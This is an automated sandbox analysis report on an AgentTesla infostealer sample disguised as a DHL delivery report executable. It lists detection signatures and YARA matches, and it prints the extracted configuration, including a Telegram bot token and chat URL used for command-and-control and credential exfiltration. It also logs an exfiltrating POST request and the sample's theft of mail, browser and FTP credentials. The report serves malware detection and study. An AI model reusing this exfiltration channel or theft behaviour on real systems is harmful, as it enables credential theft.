Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Dhl recent package delivery report needs attention.exe

Overview

General Information

Sample Name:Dhl recent package delivery report needs attention.exe
Analysis ID:626595
MD5:163d3bc2c523dc10c959474aa3f69d56
SHA1:5338e0aaea69b582d22ff624b4a9fd4efc9eb707
SHA256:1040411f26f6464fb485e92e74c08c559a6feb9bed0eadc44e831a08c80e8a01
Tags:AgentTeslaDHLexeTelegram
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Dhl recent package delivery report needs attention.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe" MD5: 163D3BC2C523DC10C959474AA3F69D56)
    • vbc.exe (PID: 2728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "1436982177", "Chat URL": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument"}
SourceRuleDescriptionAuthorStrings
00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.636043814.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000002.00000000.381341061.0000000000612000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            2.0.vbc.exe.610000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.0.vbc.exe.610000.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                2.0.vbc.exe.610000.3.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  2.0.vbc.exe.610000.3.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                  • 0x32c56:$s10: logins
                  • 0x326bd:$s11: credential
                  • 0x2ec03:$g1: get_Clipboard
                  • 0x2ec11:$g2: get_Keyboard
                  • 0x2ec1e:$g3: get_Password
                  • 0x2ff1b:$g4: get_CtrlKeyDown
                  • 0x2ff2b:$g5: get_ShiftKeyDown
                  • 0x2ff3c:$g6: get_AltKeyDown
                  2.2.vbc.exe.610000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 33 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1436982177", "Chat URL": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument"}
                    Source: vbc.exe.2728.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendMessage"}
                    Source: Dhl recent package delivery report needs attention.exeReversingLabs: Detection: 36%
                    Source: Dhl recent package delivery report needs attention.exeJoe Sandbox ML: detected
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49770 version: TLS 1.2
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6Host: api.telegram.orgContent-Length: 1007Expect: 100-continueConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: vbc.exe, 00000002.00000002.639895069.0000000006CEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: vbc.exe, 00000002.00000002.640666655.0000000009DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hEsAGj.com
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/L
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2v
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/
                    Source: Dhl recent package delivery report needs attention.exeString found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.382250415.0000000000612000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.380913160.0000000000612000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocumentdocument-----
                    Source: vbc.exe, 00000002.00000002.639841267.0000000006CD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4Hkp
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dafa.fa
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyuDgc6hArJiFp.org
                    Source: vbc.exe, 00000002.00000002.637072337.0000000006981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot5279095555:AAE4HwAzPbUle9whPqEu6faWeNRU-6BRHps/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da35bf231981d6Host: api.telegram.orgContent-Length: 1007Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49770 version: TLS 1.2
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388094558.000000000085B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 2.0.vbc.exe.610000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.0.vbc.exe.610000.4.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.0.vbc.exe.610000.3.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.0.vbc.exe.610000.1.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 2.2.vbc.exe.610000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBB4BE492u002d6011u002d480Bu002d9BB6u002d62392DD3DBCEu007d/C1CFE8FFu002d83FDu002d4C7Fu002d8602u002d9133ABE62880.csLarge array initialization: .cctor: array initializer size 11668
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 2.0.vbc.exe.610000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.2.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.353dd30.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 2.0.vbc.exe.610000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 1.2.Dhl recent package delivery report needs attention.exe.3509510.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008DF0802_2_008DF080
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008DF3C82_2_008DF3C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008D02C22_2_008D02C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_008DF3BD2_2_008DF3BD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A104BC82_2_0A104BC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A1030E82_2_0A1030E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A1011502_2_0A101150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A104F402_2_0A104F40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 2_2_0A1087802_2_0A108780
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeCode function: 1_2_049EEF28 CreateProcessAsUserA,1_2_049EEF28
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.387791663.0000000000250000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameAcroCEF.exe> vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.387791663.0000000000250000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameAcroCEF.exe< vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388770101.0000000002518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoOGLJXHkjIUdDHWuyQTkUEYbpke.exe4 vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exe, 00000001.00000002.388827798.0000000003509000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameoOGLJXHkjIUdDHWuyQTkUEYbpke.exe4 vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exeBinary or memory string: OriginalFilenameAcroCEF.exe> vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exeBinary or memory string: OriginalFilenameAcroCEF.exe< vs Dhl recent package delivery report needs attention.exe
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Dhl recent package delivery report needs attention.exeReversingLabs: Detection: 36%
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe "C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exe"
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dhl recent package delivery report needs attention.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.csCryptographic APIs: 'CreateDecryptor'
                    Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: Dhl recent package delivery report needs attention.exe, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.csCryptographic APIs: 'CreateDecryptor'
                    Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.0.Dhl recent package delivery report needs attention.exe.1e0000.0.unpack, u001fu0003/u009b.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.0.vbc.exe.610000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.0.vbc.exe.610000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.0.vbc.exe.610000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 2.0.vbc.exe.610000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Dhl recent package delivery report needs attention.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeCode function: 1_2_049E2857 push ebx; ret 1_2_049E287A
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.52092762283
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile created: \dhl recent package delivery report needs attention.exe
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeFile created: \dhl recent package delivery report needs attention.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Dhl recent package delivery report needs attention.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
